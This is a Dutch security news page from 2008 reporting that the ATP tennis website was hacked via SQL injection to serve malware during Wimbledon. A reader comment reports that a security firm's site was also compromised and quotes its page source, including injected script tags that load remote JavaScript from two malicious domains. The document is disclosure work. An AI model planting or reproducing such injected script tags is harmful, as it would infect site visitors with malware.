Nieuws

ATP website infecteert bezoekers tijdens Wimbledon

vrijdag 27 juni 2008, 15:20 door Redactie, 2 reacties

De website van de ATP (Association of Tennis Professionals) is tijdens een geautomatiseerde aanval gehackt en voorzien van een script dat bezoekers met malware probeert te infecteren. De SQL-injectie aanval vond op een goed moment plaats, aangezien deze week Wimbledon is begonnen. "Veel gebruikers beseffen niet hoe omvangrijk de SQL-injectie aanvallen zijn die we de afgelopen maanden hebben gezien," zegt virusonderzoeker Fraser Howard.

Microsoft luidde deze week nog de noodklok over SQL-injectie en stelde verschillende tools beschikbaar die webmasters hun website op beveiligingsproblemen laat controleren.

Update: typo verholpen

Nationale Recherche arresteert Limburgse hacker

Schneier: Cameratoezicht maakt politie lui

Reacties (2)

27-06-2008, 16:37 door Bitwiper

[font=Arial]Naast ATP en verschillende NL sites (zie [url=http://www.security.nl/article/18831/1/68%25_malware_op_legitieme_websites_aangetroffen.html]1[/url] en [url=http://www.security.nl/article/18953/1/Microsoft_luidt_noodklok_over_SQL-injectie_aanvallen.html]2[/url]) worden ook bedrijven gekraakt die pretenderen te weten hoe het wel moet, zoals Interactive Business Systems (IBS) die onder meer security infrastructures zegt te realiseren. Op hun 'Design & Implementation' webpage (http://www.ibs.com/services/infrastructure/design_implementation.asp) staat onder meer:

Security measures must be balanced against usability
Internet connections, remote users and wireless devices bring important security issues to network infrastructure design. To accommodate these channels, enterprises have to choose security measures that don't impede effective usage of their networks.

The IBS approach to architecting security balances appropriate technological and policy measures with each client's data protection needs. Our network and security specialists make sure they understand your organization's security requirements, then design and implement solutions that work for you.

Our Services
IBS has the expertise to secure networks from small to very large. Some of our services and technologies we use are:

* VPN implementations
* Firewall implementations and configuration
* [color=red]Secure Internet servers[/color]
* Wireless LAN implementations
* Redundancy and failover solutions
* Backup and recovery solutions
* [color=red]Intrusion detection systems[/color]
* Encryption

Technologies
IBS consultants involved in the design and implementation of security systems typically have training with Microsoft systems, Cisco systems and/or Novell systems. Additionally, IBS maintains partnerships with these major vendors.

Helaas gaat het in de titelbalk al fout, want de source van die webpage begint met:
[color=red]‹HTML›‹HEAD›‹TITLE›IBS Security Solutions‹script src=http://www.app52.com/b.js›‹/script›‹script src=http://www.apps84.com/b.js›‹/script›‹/TITLE›[/color]

En de source van bijv. http://www.ibs.com/services/infrastructure/security_assessment.asp, How do you know if your network is secure? begint met:
[color=red]‹HTML›‹HEAD›‹TITLE›Identify System Vulnerabilities With IBS' Security Assessment‹script src=http://www.app52.com/b.js›‹/script›‹script src=http://www.apps84.com/b.js›‹/script›‹/TITLE›[/color]

Gezien het feit dat ze al enkele weken gekraakt zijn moeten ze zelf ook maar eens met intrusion detection systems en assessments aan de gang...

Aanvulling: het kleine lettertype wordt door security.nl veroorzaakt, ik krijg het niet weg, achter 'typo verholpen' door Redactie zal wel een close tag ontbreken of zo[/font]

30-06-2008, 10:53 door spatieman

het balletje kwam van links..

Reageren

Deze posting is gelocked. Reageren is niet meer mogelijk.

Vacature

Cybersecurity Trainer / Streamer

Toe aan een nieuwe nieuwe job waarmee je het verschil maakt? In de Certified Secure trainingen laat je deelnemers zien hoe actuele kwetsbaarheden structureel verholpen worden. Ook werk je actief mee aan de ontwikkeling van onze gamified security challenges. Bij het maken van challenges kom je telkens nieuwe technieken tegen, van Flutter tot GraphQL, van Elastic Search tot Kubernetes.

Lees meer

End-to-end encryptie:

Vacature

IT Security Officer

Utrecht heeft jou nodig! Als Information Security Officer vertaal je beleid naar technische uitvoering. Dit is cruciaal voor het waarborgen van de informatiebeveiliging van onze inwoners. Je krijgt de kans om betrokken te zijn bij complexe projecten met de nieuwste technologieën en kunt jouw stempel drukken op innovatie. Solliciteer nu!

Lees meer

Vacature

Digital Designer

Ben jij een Grafisch vormgever, UI-designer, Game-artist of gewoon een ‘self-proclaimed creative genius’, die op zoek is naar een leuke en uitdagende baan waarin je al je creativiteit kwijt kan?Je werkt samen met onze developers en UI/UX-designer aan onze Gamified Cybersecurity Challenges welke jij voorziet van de mooiste designs.

Lees meer

Vacature

Senior Full Stack Developer

Als full stack developer bij Certified Secure maak je de mooiste cybersecurity challenges die onze deelnemers wereldwijd uitdagen en inspireren. Alle challenges zijn gebaseerd op actuele kwetsbaarheden, je komt dus telkens nieuwe technieken tegen, van machine learning tot web assembly, van Swift UI tot GCP.

Lees meer

Security.NL - X

10-01-2024 door Redactie

Altijd meteen op de hoogte van het laatste security nieuws? Volg ons ook op X!

Lees meer

ATP website infecteert bezoekers tijdens Wimbledon

End-to-end encryptie:

Wachtwoord Vergeten

Password Reset

Registreren